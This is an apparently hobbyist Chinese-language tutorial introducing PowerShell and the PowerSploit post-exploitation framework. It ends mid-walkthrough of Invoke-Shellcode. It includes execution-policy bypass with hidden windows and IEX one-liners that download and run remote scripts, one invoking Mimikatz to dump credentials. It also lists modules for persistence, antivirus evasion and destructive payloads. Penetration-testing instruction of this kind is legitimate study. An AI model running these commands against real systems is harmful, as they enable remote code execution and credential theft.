一.Powershell
我們先來(lái)說(shuō)說(shuō)powershell,PowerShell 是運(yùn)行在 Windows上實(shí)現(xiàn)系統(tǒng)和應(yīng)用程序管理自動(dòng)化的命令行腳本環(huán)境。你可以把它看成是命令行提示符 cmd.exe 的擴(kuò)充,或是顛覆。Powershell需要.NET環(huán)境的支持,同時(shí)支持.NET對(duì)象。其可讀性,易用性,可以位居當(dāng)前所有 shell 之首。
這是別人說(shuō)的,不過(guò)稍微研究下覺(jué)得,哇塞,這東西真的挺牛的,除了語(yǔ)法麻煩以外,剩下都挺好,不過(guò)語(yǔ)法麻煩讓我們這種英文不好的人怎么玩啊

當(dāng)前 PowerShell 有五個(gè)版本,分別為 1.0,2.0,3.0,4.0,5.0
當(dāng)時(shí)看別人的文章都說(shuō)是有四個(gè)版本,但是我打開(kāi)windows10看一眼,恩,微軟更新了,windows10自帶的5.(好幾)的版本啊

先來(lái)看看他的基本命令:
新建目錄 New-Item whitecellclub -ItemType Directory
新建文件 New-Item light.txt -ItemType File
刪除目錄 Remove-Item whitecellclub
顯示文本內(nèi)容 Get-Content light.txt
設(shè)置文本內(nèi)容 Set-Content light.txt -Value “i love light so much”
追加內(nèi)容 Add-Content light.txt -Value “but i love you more”
清除內(nèi)容 Clear-Content light.txt
看看吧,什么感覺(jué),你還喜歡他么?
不過(guò)好在,微軟也想到了這個(gè)問(wèn)題,我們可以用windows下的命令跟Linux下的命令,比如:

這里說(shuō)一下,我們?cè)趺纯次覀僷owershell的版本,
Get-Host
這個(gè)是虛擬機(jī)的win7,所以是2.0的版本
powershell還有一些比較叼的用法:
本地權(quán)限繞過(guò)執(zhí)行
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隱藏權(quán)限繞過(guò)執(zhí)行腳本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
-NoProfile -WindowStyle Hidden(隱藏窗口) -File xxx.ps1
直接用IEX下載遠(yuǎn)程的PS1腳本回來(lái)權(quán)限繞過(guò)執(zhí)行
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-
Mimikatz -DumpCreds"
我們可以來(lái)試一下:
這個(gè)命令是可以看到我們的版本的


完美繞過(guò)。╬s:這里說(shuō)一下,ps1結(jié)尾的是powershell腳本,大家可以自己去研究下,我這里就不在贅述了,因?yàn)槲乙膊粫?huì)寫(xiě)這種腳本)
二. Powersploit
介紹完了,我們開(kāi)始我們的正題吧 Powersploit在內(nèi)網(wǎng)滲透中的使用
powersploit一款基于powershell的后滲透(Post-Exploitation)框架,集成大量滲透相關(guān)模塊和功能。
github地址: https://github.com/mattifestation/PowerSploit
這里才是重點(diǎn),我們開(kāi)始吧:
首先,我在我本機(jī)上下載這個(gè)腳本文件

ps:我本機(jī)用的是ubuntu,所以我這里就用ubuntu代替kali的操作
下載完成之后,我們把我們下載的文件放到apache目錄小,讓我們可以遠(yuǎn)程下載,然后啟動(dòng)apache
service apache2 start
然后我們?cè)L問(wèn)我們的127.0.0.1 保證我們可以訪問(wèn)的到

他的目錄就跟metasploit一樣,分工明確
CodeExecution 在目標(biāo)主機(jī)執(zhí)行代碼
ScriptModification 在目標(biāo)主機(jī)上創(chuàng)建或修改腳本
Persistence 后門(mén)腳本(持久性控制)
AntivirusBypass 發(fā)現(xiàn)殺軟查殺特征
Exfiltration 目標(biāo)主機(jī)上的信息搜集工具
Mayhem 藍(lán)屏等破壞性腳本
Recon 以目標(biāo)主機(jī)為跳板進(jìn)行內(nèi)網(wǎng)信息偵查
(1). Invoke-Shellcode
我們使用 Invoke-Shellcode
Invoke-Shellcode的作用:將shellcode插入您選擇的進(jìn)程ID或本地PowerShell中。
Invoke-Shellcode配合上metasploit,可以達(dá)到意想不到的效果
現(xiàn)在主機(jī)上下載我們的腳本(當(dāng)然,你也可以直接從github上去下載,也可以從我們本機(jī)下載)
IEX (New-Object Net.WebClient).DownloadString("http://IP Adress/CodeExecution/Invoke--Shellcode.ps1")
|